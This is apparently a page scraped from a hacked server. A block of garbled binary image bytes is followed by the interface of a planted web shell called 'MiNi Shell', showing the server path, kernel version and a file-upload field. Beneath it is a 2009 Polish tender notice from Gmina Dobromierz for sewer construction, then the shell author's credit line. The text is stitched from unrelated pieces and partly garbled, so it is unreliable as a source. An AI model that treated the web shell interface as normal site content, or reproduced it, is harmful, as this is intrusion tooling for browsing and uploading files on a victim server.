JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090114/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090114/15627-N-2009.html

<p class="kh_header"><b>Dobromierz: Budowa kanalizacji sanitarnej z przyłączami w Dobromierzu i Serwinowie dla zadania inwestycyjnego pn Budowa systemu gospodarki ściekowej dla aglomeracji Dobromierz - Faza I realizowanej przy współudziale Norweskich Mechanizmów Finansowych</b><br>
<b>Numer ogłoszenia: 15627 - 2009; data zamieszczenia: 14.01.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Dobromierz , Plac  Wolności 24, 58-170 Dobromierz, woj. dolnośląskie, tel. 074 8586217, faks 074 8586460.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.dobromierz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa kanalizacji sanitarnej z przyłączami w Dobromierzu i Serwinowie dla zadania inwestycyjnego pn Budowa systemu gospodarki ściekowej dla aglomeracji Dobromierz - Faza I realizowanej przy współudziale Norweskich Mechanizmów Finansowych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia w postępowaniu, w trybie przetargu nieograniczonego  jest: 
         Budowa kanalizacji sanitarnej z przyłączami w Dobromierzu i Serwinowie dla     zadania inwestycyjnego p.n.: (Budowa systemu gospodarki ściekowej dla aglomeracji Dobromierz -  faza I) - realizowanego przy współudziale Norweskich Mechanizmów Finansowych.

2.   O udzielenie zamówienia mogą ubiegać się wyłącznie Wykonawcy, którzy spełniają warunki określone w art. 22 ust. 1 uPzp oraz  których oferta odpowiada warunkom określonym w uPzp i spełnia wymagania określone w niniejszej specyfikacji istotnych warunków zamówienia. 

3.   Zgodnie z art. 36 ust 5 Ustawy Prawo Zamówień Publicznych Zamawiający oczekuje, ofert  Wykonawców, którzy będą  samodzielnie  ubiegać się o udzielenie zamówienia.                 
ZADANIE OBEJMUJE WYKONANIE NASTĘPUJĄCYCH OPRACOWAŃ I MATERIAŁÓW:
-	budowę sieci kanalizacji sanitarnej z przyłączami,
-	opracowanie projektu wykonawczego kanalizacji sanitarnej z przyłączami  miejscowości   Dobromierz  i Serwinów w zakresie:
-	aktualizacji mapy do celów projektowych w skali 1:500 lub 1:1000 z wypisami z rejestru gruntów,  
-	projekt wykonawczy   - 4 egzemplarze, 
-	aktualizacja oświadczeń właścicieli gruntów i niezbędnych uzgodnień,   - 2 egzemplarze,
-	Zamawiający ponadto wymaga wydzielenia z prowadzonych wykopów materiałów niebezpiecznych takich jak asfalt i złożenia we wskazanym miejscu i wydzielenie kostki brukowej..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.13.00-8, 45.23.31.42-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Informacja na temat wadium
1. Oferta musi być zabezpieczona wadium w wysokości: 40.000,00 zł. (słowni: czterdzieści  tysięcy złotych),

2. Wadium może być wnoszone w jednej lub kilku następujących formach: 
1)	w pieniądzu
-	przekazem bankowym na rachunek Zamawiającego:
     BZ WBK SA IIo Świebodzice Gmina Dobromierz  44 1090 2356 0000 0001 0099 1295

Z dopiskiem: (wadium dla przetargu: Budowa kanalizacji sanitarnej z przyłączami w Dobromierzu i Serwinowie dla zadania inwestycyjnego pn )Budowa systemu gospodarki ściekowej dla aglomeracji Dobromierz - Faza I realizowanej przy współudziale Norweskich Mechanizmów Finansowych   

Wniesienie wadium w pieniądzu będzie skuteczne, jeżeli w podanym terminie znajdzie się na rachunku bankowym Zamawiającego
       2)   w kasie Urzędu Gminy:
- w poręczeniach lub  gwarancjach bankowych; 
- w gwarancjach ubezpieczeniowych; 
- poręczeniach udzielanych przez podmioty, o których mowa w art. 6 ust. 3 pkt. 4 lit. b   ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158 oraz  z 2002r. Nr 25, poz. 253, Nr 66, poz. 596 i Nr 216, poz. 1824).

Wadium wniesione w któreś z ww form należy złożyć w formie oryginału w kasie (I piętro) Zamawiającego.

3. Wadium winno być wniesione do godz. 14oo, dnia poprzedzającego dzień, w którym upływa termin składania ofert.  
W przypadku złożenia wadium w formie określonej w § 11 ust. 2, pkt 1 (przekazem bankowym), za dzień jego wniesienia uznaje się dzień wpływu środków na rachunek bankowy Zamawiającego.

4. Wadium zostanie zwrócone wszystkim Wykonawcom niezwłocznie po podpisaniu umowy lub   w innych przypadkach unormowanych w art. 46 ust. 1 i 2 uPzp.

5. Wykonawca, który nie zabezpieczy oferty ww. formą wadium zostanie przez Zamawiającego wykluczony z ubiegania się o udzielenie zamówienia publicznego.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Opis warunków udziału w postępowaniu (z uwzględnieniem ich znaczenia, jeżeli dotyczy) oraz opis sposobu dokonywania oceny spełniania tych warunków: 
III.2.1. 
Wykonawcy ubiegający się o zamówienie publiczne muszą spełniać niżej wymienione warunki udziału w postępowaniu:
2.1.1	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert (§ 1 ust. 1 pkt 1 rozp.*)
2.1.2	Aktualne zaświadczenie właściwego Naczelnika Urzędu Skarbowego potwierdzające, że Wykonawca nie zalega z opłacaniem podatków, opłat lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji Naczelnika US, wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert (§ 1 ust. 1 pkt 6 rozp.*)
2.1.3	Aktualne zaświadczenie z właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne lub społeczne lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji oddziału ZUS wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert (§ 1 ust. 1 pkt 6 rozp.*)
2.1.4	Aktualna informacja z Krajowego Rejestru Karnego albo równoważne zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia osoby w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawiona nie wcześniej niż 6miesięcy przed upływem terminu składania ofert. (§ 1 ust. 1 pkt 4 rozp.*)
2.1.5	Aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawiona nie wcześniej niż 6miesięcy przed upływem terminu składania ofert (§ 1 ust. 1 pkt 5 rozp.*)
2.1.6	Szczegółowy kosztorys ofertowy.
2.1.7	Opis organizacji i metod realizacji inwestycji zrozumienie warunków miejscowych opis  tych warunków i ryzyk zagrażających realizacji projektu; zrozumienie sposobu realizacji inwestycji, realizacji projektu współfinansowanego ze środków Unii Europejskiej, oraz wynikających z tego obowiązków Wykonawcy; udokumentowanie zapoznania się z placem budowy.
2.1.8	Sprawozdanie finansowe, a jeżeli podlega ono badaniu przez biegłego rewidenta zgodnie z przepisami o rachunkowości również  z opinią o badanym sprawozdaniu albo w przypadku Wykonawców nie zobowiązanych do sporządzania sprawozdania finansowego, inny dokument określający obroty, zysk oraz zobowiązania i należności - za okres nie dłuższy niż ostatnie 3 lata obrotowe, a jeżeli okres prowadzenia działalności jest krótszy - za ten okres (§ 1 ust. 3 pkt 1 rozp.*)
2.1.9	Polisa lub inny dokument ubezpieczenia, potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej (§ 1 ust. 3 pkt 3 rozp.*) na kwotę minimum 1.000.000,00 zł
2.1.10	Informacje na temat przeciętnej liczby zatrudnionych pracowników w okresie ostatnich   3 lat, a w przypadku gdy okres prowadzenia działalności jest krótszy - w tym okresie (§ 1 ust. 2 pkt 1 rozp.*)
2.1.11	Wykaz osób które będą wykonywać zamówienie lub będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności (§ 1 ust. 2 pkt 3 rozp.*) Do wykazu należy załączyć aktualną kopię dokumentu potwierdzającego posiadanie uprawnień i zaświadczenie o wpisie do właściwej izby samorządu zawodowego.   
2.1.12	Wykaz wykonanych w okresie ostatnich 5 lat robót budowlanych w zakresie    gospodarki wodno-ściekowej oraz w okresie ostatnich 3 lat usług, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością minimum 4.000.000,00, z podaniem ich rodzaju, daty i miejsca wykonania - w przypadku robót budowlanych oraz rodzaju , przedmiotu, dat wykonania i odbiorców - w przypadku usług, oraz załączenie dokumentów potwierdzających, że zadania te zostały wykonane należycie (§ 1 ust. 2 pkt 4-5 rozp.*). W odniesieniu do robót wykonawczych Zamawiający oczekuje wykonania 3 robót o (każda) wartości minimum1.000.000,00 zł, w przypadku usług 1 projektu  budowlanego  o zakresie minimum 10 km sieci kanalizacji sanitarnej zakończonej pozwoleniem na budowę  i  1 aktualizacji mapy do celów projektowych w obszarze minimum 150 ha.
2.1.13	Wykaz niezbędnych do wykonania zamówienia narzędzi i urządzeń, jakie posiada Wykonawca (§ 1 ust. 2 pkt 2 rozp.*)                       
2.1.14	Zaświadczenie o przyjęciu do utylizacji mas asfaltowych lub sposób ich utylizacji. Udokumentowanie zapewnienia nadzoru archeologicznego. (nadzór archeologiczny należy wycenić w kosztach realizacji inwestycji)
2.1.15	Proponowany harmonogram rzeczowo - finansowy wykonania przedmiotu zamówienia z terminem rozpoczęcia i zakończenia poszczególnych robót
2.1.16	Dowód wniesienia wadium.  
2.1.17	Wzór umowy między Zamawiającym a Wykonawcą - należy załączyć do oferty zaparafowany, przez uprawnionego do podpisania oferty przedstawiciela Wykonawcy, wzór umowy
III.2.3. 
INFORMACJA O OŚWIADCZENIACH I DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU       W POSTĘPOWANIU (JEŻELI DOTYCZY):
Wykaz załączników do SIWZ
Załącznikami do niniejszej SIWZ są następujące wzory:
Lp.	Nazwa (rodzaj) dokumentu i jego cechy	Nr załącznika do oferty
1	Oferta wraz z ofertą cenową zgodną z formularzem oferty 	Zał .1
Wzór formularza jest dodatkiem nr 1  do SIWZ
2	Oświadczenie w sprawie spełnienia przez Wykonawcę warunków   art. 22 ust. 1 pkt.  uPzp i niepodlegania wykluczeniu na podstawie art. 24 ust. 1 i 2 uPzp
	Zał. 2 
Wzór formularza jest dodatkiem nr 2  do SIWZ
3	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert (§ 1 ust. 1 pkt 1 rozp.*)	Zał. 3
4	Aktualne zaświadczenie właściwego Naczelnika Urzędu Skarbowego potwierdzające, że Wykonawca nie zalega z opłacaniem podatków, opłat lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji Naczelnika US, wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert (§ 1 ust. 1 pkt 6 rozp.*) 	Zał. 4
5	Aktualne zaświadczenie z właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne lub społeczne lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji oddziału ZUS wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert (§ 1 ust. 1 pkt 6 rozp.*) 	Zał. 5
6	Aktualna informacja z Krajowego Rejestru Karnego albo równoważne zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia osoby w zakresie określonym  w art. 24 ust. 1 pkt 4-8 ustawy, wystawiona nie wcześniej niż 6miesięcy przed upływem terminu składania ofert. (§ 1 ust. 1 pkt 4 rozp.*) 	Zał. 6
7	Aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawiona nie wcześniej niż 6miesięcy przed upływem terminu składania ofert (§ 1 ust. 1 pkt 5 rozp.*) 	Zał. 7
8	Szczegółowy kosztorys ofertowy. 	Zał. 8
9	Opis organizacji i metod realizacji inwestycji.
zrozumienie warunków miejscowych opis  tych warunków i ryzyk zagrażających realizacji projektu; zrozumienie sposobu realizacji inwestycji, realizacji projektu współfinansowanego ze środków Unii Europejskiej, oraz wynikających z tego obowiązków Wykonawcy; udokumentowanie zapoznania się z placem budowy. 	Zał. 9

10	Sprawozdanie finansowe, a jeżeli podlega ono badaniu przez biegłego rewidenta zgodnie z przepisami o rachunkowości również     z opinią o badanym sprawozdaniu albo w przypadku Wykonawców nie zobowiązanych do sporządzania sprawozdania finansowego, inny dokument określający obroty, zysk oraz zobowiązania i należności - za okres nie dłuższy niż ostatnie 3 lata obrotowe, a jeżeli okres prowadzenia działalności jest krótszy - za ten okres (§ 1 ust. 3 pkt 1 rozp.*) 	Zał. 10
Wzór formularza jest dodatkiem nr 3  do SIWZ
11	Polisa lub inny dokument ubezpieczenia, potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej (§ 1 ust. 3 pkt 3 rozp.*) na kwotę minimum 1.000.000,00 zł	Zał. 11
12	Informacje na temat przeciętnej liczby zatrudnionych pracowników w okresie ostatnich   3 lat, a w przypadku gdy okres prowadzenia działalności jest krótszy - w tym okresie (§ 1 ust. 2 pkt 1 rozp.*) 	Zał. 12 
Wzór formularza jest dodatkiem nr 4  do SIWZ
13	Wykaz osób które będą wykonywać zamówienie lub będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności (§ 1 ust. 2 pkt 3 rozp.*) Do wykazu należy załączyć aktualną kopię dokumentu potwierdzającego posiadanie uprawnień i zaświadczenie o wpisie do właściwej izby samorządu zawodowego.   	Zał. 13 
Wzór formularza jest  dodatkiem nr 5  do SIWZ
14	Wykaz wykonanych w okresie ostatnich 5 lat robót budowlanych w zakresie gospodarki wodno-ściekowej oraz w okresie ostatnich 3 lat usług, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem          i wartością minimum 4.000.000,00, z podaniem ich rodzaju, daty      i miejsca wykonania - w przypadku robót budowlanych oraz rodzaju, przedmiotu, dat wykonania i odbiorców - w przypadku usług, oraz załączenie dokumentów potwierdzających, że zadania te zostały wykonane należycie (§ 1 ust. 2 pkt 4-5 rozp.*). 
W odniesieniu do robót wykonawczych Zamawiający oczekuje wykonania 3 robót o (każda) wartości minimum 1.000.000,00 zł, w przypadku usług 1 projektu  budowlanego o zakresie minimum 10 km sieci kanalizacji sanitarnej zakończonej pozwoleniem na budowę i 1 aktualizacji mapy do celów projektowych w obszarze minimum 150 ha.	Zał. 14
 Wzór formularza jest  dodatkiem nr 6  do SIWZ
15	Wykaz niezbędnych do wykonania zamówienia narzędzi                 i urządzeń, jakie posiada Wykonawca (§ 1 ust. 2 pkt 2 rozp.*)                       	Zał. 15
Wzór formularza jest  dodatkiem nr 7  do SIWZ
16.	Opis organizacji i realizacji przedmiotu zamówienia. Zaświadczenie o przyjęciu do utylizacji mas asfaltowych lub sposób ich utylizacji. Udokumentowanie zapewnienia nadzoru    archeologicznego. (nadzór archeologiczny należy wycenić           w kosztach realizacji inwestycji)	Zał. 16
17	Proponowany harmonogram rzeczowo - finansowy wykonania przedmiotu zamówienia z terminem rozpoczęcia i zakończenia poszczególnych robót	Zał. 17
18	Dowód wniesienia wadium.  	Zał. 18
19	Wzór umowy między Zamawiającym a Wykonawcą - należy załączyć do oferty zaparafowany, przez uprawnionego do podpisania oferty przedstawiciela Wykonawcy, wzór umowy	Zał. 19
Wzór formularza jest  dodatkiem nr 8  do SIWZ.</li>
</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 75</li>
<li>2 - termin - 15</li>
<li>3 - serwis - 10</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.dobromierz.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www.bip.dobromierz.pl.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.01.2009 godzina 12:00, miejsce: Gmina Dobromierz, 59-170 Dobromierz, Plac Wolności 2.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 60 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com